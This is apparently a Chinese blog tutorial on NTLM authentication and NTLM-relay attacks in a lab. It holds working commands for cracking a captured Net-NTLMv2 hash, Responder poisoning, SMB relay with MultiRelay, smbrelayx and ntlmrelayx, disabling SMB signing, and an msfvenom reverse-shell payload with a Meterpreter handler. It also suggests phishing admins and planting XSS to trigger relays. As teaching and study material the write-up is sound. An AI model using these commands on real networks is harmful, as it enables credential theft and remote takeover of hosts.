[内网渗透]—NTLM网络认证及NTLM-Relay攻击

已于 2023-11-06 13:34:53 修改
阅读量1k 收藏 10
点赞数
分类专栏: 内网 文章标签: 网络
于 2022-12-16 11:28:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54902210/article/details/128340465
版权

文章首发于先知社区:NTLM网络认证及NTLM-Relay攻击

NTML网络认证

Windows认证分为本地认证和网络认证,当我们开机登录用户账户时,就需要将lsass.exe进程转换的明文密码hash与 sam文件进行比对,这种方式即为——本地认证

而当我们访问同一局域网的一台主机上的SMB共享时,需要提供凭证通过验证才能访问,这个过程就会设计windows的网络认证。

NTLM协议

NTLM协议的认证共需要三个步骤完成:协商、挑战、认证。也叫挑战响应机制

  • 协商,这个是为了解决历史遗留问题,也就是为了向下兼容,双方先确定一下传输协议的版本等各种信息。版本主要分为两种:NTLMv1与NTLM v2
  • 挑战,下面会介绍。
  • 验证,对质询的最后结果进行一个验证,验证通过后,即允许访问资源

NTLMv1、NTLM v2区别

不同点

  • NTLM v1的Challenge有8位,NTLM v2的Challenge为16位
  • NTLM v1的主要加密算法是DES,NTLM v2的主要加密算法是HMAC-MD5。

共同点

  • 都是通过NTLM Hash进行的加密

挑战的完整过程

在这里插入图片描述

工作组中
  1. client向server发送用户信息(即用户名)请求
  2. server接受到请求后,判断本地用户列表是否存在client发送的用户名,如果没有返回认证失败,如果有,生成一个16位的随机数即Challenge, 然后使用登录用户名对应的NTLM Hash加密Challenge, 生成Challenge1保存在内存中。同时,生成Challenge1后,将Challenge发送给client。
  3. 当client接收到Chalenge时,将发送的用户名所对应的NTLM hash对Chalenge进行加密即Response(NET-NTLM-Hash),并Response发送给server。
  4. 接着就是验证过程了,server在收到Response后,将其与Chalenge1进行比对,如果相同,则验证成功
域环境中
  1. 由于域机器SAM文件中不存在域用户的NTLM hash,所以服务器将客户端用户名、Challenge、response通过 Netlogon协议交到域控手中,让域控对其进行身份验证。
  2. 域控通过客户端用户名在自己的ntds.dit中找到对应的NTLM-Hash,用Challenge对其进行加密,再与NET-NTLM-Hash进行对比。如果相同则表示用户拥有的密码是正确的,否则则验证失败,DC将结果返回给服务器。
  3. 服务器根据DC的结果成功与否返回给客户端。

wirshark抓包分析

1、模拟client访问server的共享

在这里插入图片描述

2、抓包看下共享产生的SMB协议,其中Negotiate Protocol Responss就是进行协商的过程

在这里插入图片描述

3、服务器向客户端返回16位长的challenge

在这里插入图片描述

4、接着客户端将发送的用户名所对应的NTLM hash对Chalenge进行加密得到Response

在这里插入图片描述

5、将获取到的Response进行Net-NTLMhash格式的拼接

Net-NTLMhash格式:

username::domain:challenge:HMAC-MD5:blob

username、domain即为:

在这里插入图片描述

challenge就是第二步中获取的内容:

7f3085e50542ee4d

HMAC-MD5即为NTProofStr的内容:

在这里插入图片描述

blob就是Response中除NTProofStr剩下的部分:

01010000000000005da4077f4b10d901d3c521d6bddc4ce50000000002001200530045004e00540049004d0045004e00540001001000570049004e00300038002d005000430004001a00730065006e00740069006d0065006e0074002e0063006f006d0003002c00570069006e00300038002d00700063002e00730065006e00740069006d0065006e0074002e0063006f006d0005001a00730065006e00740069006d0065006e0074002e0063006f006d00070008005da4077f4b10d901060004000200000008003000300000000000000000000000002000003b6ad2d6ec858ee23b79e3ddde29d57c3479fca6042d38c984b242c2b44d1e7f0a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00350032002e00310037003100000000000000000000000000

所以拼接好的Net-NTLMhash为:

test::SENTIMENT:7f3085e50542ee4d:4d11723d0631436ee007f9bdb1ce3a45:01010000000000005da4077f4b10d901d3c521d6bddc4ce50000000002001200530045004e00540049004d0045004e00540001001000570049004e00300038002d005000430004001a00730065006e00740069006d0065006e0074002e0063006f006d0003002c00570069006e00300038002d00700063002e00730065006e00740069006d0065006e0074002e0063006f006d0005001a00730065006e00740069006d0065006e0074002e0063006f006d00070008005da4077f4b10d901060004000200000008003000300000000000000000000000002000003b6ad2d6ec858ee23b79e3ddde29d57c3479fca6042d38c984b242c2b44d1e7f0a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00350032002e00310037003100000000000000000000000000

通过Net-NTLMhash破解密码

hashcat爆破

  • -m:hash的类型,5600对应NetNTLMv2,具体可参考:https://hashcat.net/wiki/doku.php
  • -o:输出文件
  • 字典文件为password.txt
  • –force 强制执行,测试系统不支持Intel OpenCL
hashcat -m 5600 test::SENTIMENT:7f3085e50542ee4d:4d11723d0631436ee007f9bdb1ce3a45:01010000000000005da4077f4b10d901d3c521d6bddc4ce50000000002001200530045004e00540049004d0045004e00540001001000570049004e00300038002d005000430004001a00730065006e00740069006d0065006e0074002e0063006f006d0003002c00570069006e00300038002d00700063002e00730065006e00740069006d0065006e0074002e0063006f006d0005001a00730065006e00740069006d0065006e0074002e0063006f006d00070008005da4077f4b10d901060004000200000008003000300000000000000000000000002000003b6ad2d6ec858ee23b79e3ddde29d57c3479fca6042d38c984b242c2b44d1e7f0a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00350032002e00310037003100000000000000000000000000 password.txt -o result.txt --force

在这里插入图片描述

Responder

下载地址:https://github.com/lgandx/Responder,kali自带在/usr/share/responder下,但有的时候不一定哪个好用,所以可以下载下来以备不时之需

前置知识

Windows系统名称解析顺序
当我们访问一个共享时 net use \aaa,其寻找这个主机名称会遵循以下的步骤:

  1. 本地hosts文件(%windir%\System32\drivers\etc\hosts)
  2. DNS缓存/DNS服务器
  3. 链路本地多播名称解析(LLMNR)和NetBIOS名称服务(NBT-NS)

如果没有在1、2项中找到对应名称,系统就会通过链路本地多播名称解析(LLMNR)和Net-BIOS名称服务(NBT-NS)在本地进行名称解析。这时,客户端就会将未经认证的UDP广播到网络中,询问它是否为本地系统的名称,由于该过程未被认证,并且广播到整个网络,从而允许网络 上的任何机器响应并声称是这台机器。

因此当用户输入不存在、包含错误或者DNS中 没有的主机名时,通过Responder工具监听LLMNR和NetBIOS广播,就可以伪装成受害者要访问的这台机器,并从而让受害者交出相应的登陆凭证。核心过程与arp欺骗类似,我们可以让攻击者作中间人,截获到客户端的Net-NTLM Hash。

获取Net-NTLMhash

监听kali的eth1网卡

sudo responder -I eth1 -fv

同网段主机访问任意不存在用户

在这里插入图片描述

本地和缓存查询不到sfss时,内网主机就会将未经认证的UDP广播到网络中,询问谁是sfss,由于该过程未被认证,并且广播到整个网络,从而允许网络 上的任何机器响应并声称自己是sfss。此时kali伪装成sfss这台机器,接着进行ntlm认证。从而让受害者交出相应的登陆凭证(Net-NTLMhash)

在这里插入图片描述

之后就可以用hashcat进行爆破了

NTLM-Relay攻击

上边获取到Net-NTLMhash后对密码进行了爆破,但若我们爆破不出密码呢?这时就可以使用NTLM-relay攻击,也叫NTLM重放攻击。

原理

在这里插入图片描述

重放本身的含义就是:攻击者利用网络监听或者其他方式盗取认证凭据,之后再把它重新发给认证服务器。

因此NTLM重放攻击也就是将窃听到的客户端Net-NTLMhash,重放到服务端。而由于攻击者拥有了该凭证,因此服务端自然而然就认为攻击者就是客户端。如果这个凭据权限足够,那么就可以控制域内其它主机,所以凭据的权限很重要。这里攻击者其实就充当了一个中间人的身份。

Responder

攻击前提

NTLM Relay攻击时在域中通过relay到smb服务将管理组成员冲放到到一些敏感的机器上。

因此relay到smb服务要求被攻击机器不能开启SMB签名,域内主机的 SMB 签名默认关闭,但域控是默认开启的。

实验环境

虚拟机IP
kali192.168.52.199
Win2012(域控)192.168.52.163
Win2016(域管理员登录)192.168.52.198
Win2008(受害机)192.168.52.171

1、先用RunFinger.py来查看下内网中开放的信息,可以看到163域控是开启了smb签名的,其他主机没有

python RunFinger.py -i 192.168.52.0/24

在这里插入图片描述

若域内其他主机开启了SMB Signing,可通过命令关闭对应服务( Windows Server系列中RequireSecuritySignature子键默认值为1)

reg add HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v RequireSecuritySignature /t REG_DWORD /d 0 /f

2、修改responder的配置文件Responder.conf,不让其对 hash 进行抓取。将SMB和HTTP的On改为Off:

sudo vim /usr/share/responder/Responder.conf

在这里插入图片描述

3、开启responder监听

responder -I eth1

4、启动MultiRelay.py

cd /usr/share/responder/tools
python3 MultiRelay.py -t  要攻击的域内目标  -u ALL
python3 MultiRelay.py -t 192.168.52.171 -u ALL

5、由于需要高权限凭证,因此在WIN16上用域管理员权限登录

在这里插入图片描述

6、返回了win08的shell

在这里插入图片描述

impacket

impacket也有对应的exp

smbrelayx.py

1、在kali上执行如下命令监听 80 和 445 端口,伪造 http 和 smb 服务:

#SMBRelay 攻击 192.168.52.171 主机,并执行 whoami 命令
python3 smbrelayx.py -h 192.168.52.171 -c whoami

2、通过owa钓鱼或者其他手段诱导域管理员或其它拥有域管账号密码的域用户访问访问 http://192.168.52.199 :

在这里插入图片描述

3、这时就成功执行whoami命令,获取到了win08的system权限

在这里插入图片描述

4、利用该思路可以尝试上线到C2,先生成一个木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.52.163 LPORT=4444 -f exe -o shell.exe
#启动监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.52.199
set lport 4444
run

5、smbrelayx.py开始重放攻击,-e是要执行的文件

python3 smbrelayx.py -h 192.168.52.171 -e shell.exe

6、重复步骤2的操作,成功返回会话

在这里插入图片描述

7、但该会话很快就会被删除

在这里插入图片描述

因此应尽快做好进程迁移

run post/windows/manage/migrate

ntlmrelayx.py

与上述方式一样还可以用ntlmrelayx.py

python3 ntlmrelayx.py -t smb://192.168.52.171 -c whoami

除邮件钓鱼外,通过共享也可

在这里插入图片描述

扩展

其实相对于impacket中的方法,Reponder的更实用一些,因为impacket中的方法需要连接kali,在实战中有些鸡肋。。。

而Reponder中,直接通过net use的一个不存在用户的方法,也不太会发生,因此可以通过另一种方式让目标机器加载net use

因为在渗透前一定是拿到了一定权限的,那就可以通过在目标index界面中插入一条xss语句,当有管理员身份的用户访问时,便可触发重放攻击

在这里插入图片描述

参考

LLMNR/NBT-NS欺骗攻击 - F0rmat’s Blog (xxe.icu)

NTLM网络认证协议分析及Net-NTLMhash的获取_山山而川’的博客-CSDN博客

NTLM-relay攻击_山山而川’的博客-CSDN博客_ntlm relay攻击

NTLM-relay攻击的原理与实现_Shanfenglan7的博客-CSDN博客_ntlmssp攻击原理

S1nJa
关注
  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基于NTLM认证的中间人攻击(含实战)
Blue_Arc的博客
08-04 1935
文章目录中间人攻击0x01 域和工作组0x02 NTLM认证(Windows)本地认证NTLM Hash的生成网络认证工作组环境NTLM认证流程域环境NTLM认证0x03 域名解析协议LLMNR解析过程NetBIOSWindows系统域名解析顺序0x04 WPAD工作原理WPAD劫持0x05 NTLM中继0x06 Responder介绍攻击演示利用LLMNR和NetBIOS截取Net-NTLM Hash利用WPAD劫持获得Net-NTLM HashSMB Relay总结**Reference** 中间人攻击
NTLM认证的Go Go HTTP请求-Golang开发
05-26
go-http-ntlm是一个Go程序包,其中包含用于http.Client的NTLM传输(http.RoundTripper实现),以发出NTLM身份验证受保护的http请求。 go-http-ntlm go-http-ntlm是一个Go程序包,其中包含用于http.Client的NTLM传输(http.RoundTripper实现),以发出NTLM身份验证受保护的http请求。 用法示例包main import(“ io / ioutil”“ log”“ net / http”“字符串”“ github.com/vadimi/go-http-ntlm”)func main(){//配置http客户端client:= http .Client {传输:&httpntlm.NtlmTransport {域:“ mydomain”,用户:“ testuser”
内网安全:NTLM-Relay
最新发布
qq_61553520的博客
01-28 1360
NTLM Hash,直接PTH;没有NTLM Hash,尝试抓取Net NTLM Hash,暴力破解明文密码,中继攻击
NTLM认证基本原理及编程简介
10-28
NTLM认证基本原理及编程简介 对需要的人很有用
ntml.rar_NTLM_NTML_ntlm算法_ntml协议认证_ntml认证
09-23
NTLM挑战模式散列认证加密协议过程,算法实现与一些想法
Windows下LM-Hash与NTLM-Hash
02-11
文档描述了Windows下LM HASH ,NTLM HASH生成原理和规则。 并利用Python脚本进行模拟。 详细描述了 挑战/响应模式(鉴权协议)的原理 详细描述了NTLM SMB通信流程 对内网渗透入门感兴趣的一定下载
针对ntlmssp攻击的本机安全攻防记(第一回)
xylz_yang的专栏
12-19 2万+
一、写在前面    这个问题说来也是恼火,切入正题之前先谈谈最近的一段狗血的经历,如果比较着急,就直接跳到第二部分吧!! 新去的一家政府支持的号称做互联网的单位(据后来观察几个部门都是凑吧的)。当初本屌是看着几个妹子不错([哈哈)才暂时决定留待观察的,其中一个就是HR妹子,初次见面给了一个回眸一笑,就在我幸福荡漾 ,甜蜜品尝笑容的时候一口凉气一闪而过,当时也没在意,就被这贱贱的笑容勾引第二天上
服务器出现大批量登录审核失败/NtLmSsp攻击
TeachnicalBrown的博客
05-02 1488
NTLMRelay的利用
Ms08067安全实验室
09-06 845
0x00 相关概念NTLM hash 和 Net-NTLM hash1、NTLM hash是指Windows系统下Security Account Manager中保存的用户密码hash。该hash的生成方法:复制将明文口令转换成十六进制的格式 转换成Unicode格式,即在每个字节之后添加0x00 对Unicode字符串作MD4加密,生成32位的十六进制数字串2、Net-NTLM hash是指网...
两种网络身份认证协议的工作流程——NTLM和Kerberos
Neonline254的博客
08-19 1101
NTLM和Kerberos是内网渗透中最常见的两种身份认证协议。理解它们的工作流程也是理解相应内网攻击手段的前置条件(如针对NTLM的中继攻击、针对Kerberos的黄金、白银票据攻击及委派攻击等)。
内网渗透测试:NTLM Relay攻击分析
whatday的专栏
07-31 6416
目录 基础知识 NTLM认证过程 NTLM中继攻击原理 获得Net-NTLM Relay的思路 利用LLMNR和NetBIOS欺骗获得Net-NTLMHash 利用WPAD劫持获得Net-NTLMHash SMB Relay(SMB中继)攻击 攻击演示 Responder中的MultiRelayx.py Impacket中的smbrelayx.py Metasploit中的smb_relay模块(ms08-068) Impcaket中的ntlmrelayx.py Ending...
内网渗透--NTLM协议详解
qq_62169455的博客
09-01 402
概述:NTLM(NT LAN Manager)认证是一种早期的Windows网络身份认证协议。它在Windows系统中用于验证用户的身份,并提供对网络资源的访问控制,它是一种基于Challenge/Response的认证机制。
The NTLM Authentication Protocol and Security Support Provider (中文翻译)
oxzhao的专栏
07-05 1348
正在学习Windows身份验证方面的东西,觉得这篇文章写的比较深入。没有找到中文版的,就花些时间把它翻译一下,希望对大家有所帮助。仅仅出于个人兴趣进行翻译,限于个人水平,难免有错误纰漏,希望大家指正。文章比较长,我边翻译边更新。The NTLM Authent
NTLM认证
路虽远,行将至。事虽难,做必达。
03-06 1万+
NTLM(NT LAN MANAGER)是一种网络认证协议,它是基于挑战(Challenge)/响应(Response)认证机制的一种认证模式。 NTLM使用在Windows NT和Windows 2000 Server(or later)工作组环境中(kerberos用在域模式下)。在AD域环境中,如果需要认证Windows NT系统,也必须采用NTLMNTLM协议的认证过程分为三步: 1、协商:主要用于确认双方协议版本(NTLM v1/NTLM v2) 2、质询:就是挑战/响应认证机制起作用
NTLM-relay攻击的原理与实现
热门推荐
Shanfenglan's blog
09-28 16万+
CATALOGNTLM相关1.用处2.认证流程其他术语NT-hash/NTLM-hashLM-hashNet-NTLM hashSSPISSPNTLM-relay原理不同版本的NTLM认证对应的responseNTLM-relay攻击如何获取到NET-NTLM hash通过responder或者inveigh工具Inveighresponder破解NET-NTLM hash(v2)其它方式的NTLM-relay攻击利用impacket的ntlmrelayssmb协议访问:http协议访问参考文章 NTLM
NTLM Relay利用
qq_18811919的博客
03-07 3249
讲述了多种NTLM Relay的利用方式包括打印机bug以及PetitPotam强制触发NTLM认证方式以及Exchange Relay与ADCS Relay的利用
ntlm relay 原理
09-17
NTLM Relay 是一种攻击技术,利用了 NTLMWindows 网络身份验证协议)的漏洞。该攻击允许黑客在网络中伪装成受害者与服务器进行通信,从而获取敏感信息或执行一些恶意操作。 NTLM Relay 攻击的原理如下: 1. 受害计算机通过 NTLM 协议与服务器进行身份验证。在此过程中,受害计算机和服务器之间会进行一系列的挑战-响应验证,包括凭据传递和会话密钥生成。 2. 黑客在网络中进行监听,并截获受害计算机与服务器之间的 NTLM 通信数据。这可以通过中间人攻击或通过 ARP 欺骗攻击完成。 3. 黑客将截获的 NTLM 通信数据传输给目标服务器,冒充受害者的身份与服务器进行通信。 4. 目标服务器接收到黑客发送的伪造的验证请求并验证其身份。由于黑客已经截获到了真实的 NTLM 通信数据,因此服务器会认为该请求来自于受害者。 5. 服务器将响应返回给黑客,并黑客将该响应转发给受害计算机。 6. 受害计算机将响应解密并发送给黑客。 通过 NTLM Relay 攻击,黑客可以实施多种恶意操作,例如获取受害者的用户名和密码、执行远程命令、篡改数据等。这种攻击技术在企业中尤其危险,因为它可能导致黑客获取管理员权限并在网络中横向移动,进一步危害整个系统的安全。 为了防止 NTLM Relay 攻击,企业应采取以下措施:禁用 NTLM 认证、启用 Kerberos 认证、使用防火墙限制对 NTLM 端口的访问、使用多因素身份验证、及时修补操作系统中的漏洞并使用最新版本的软件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值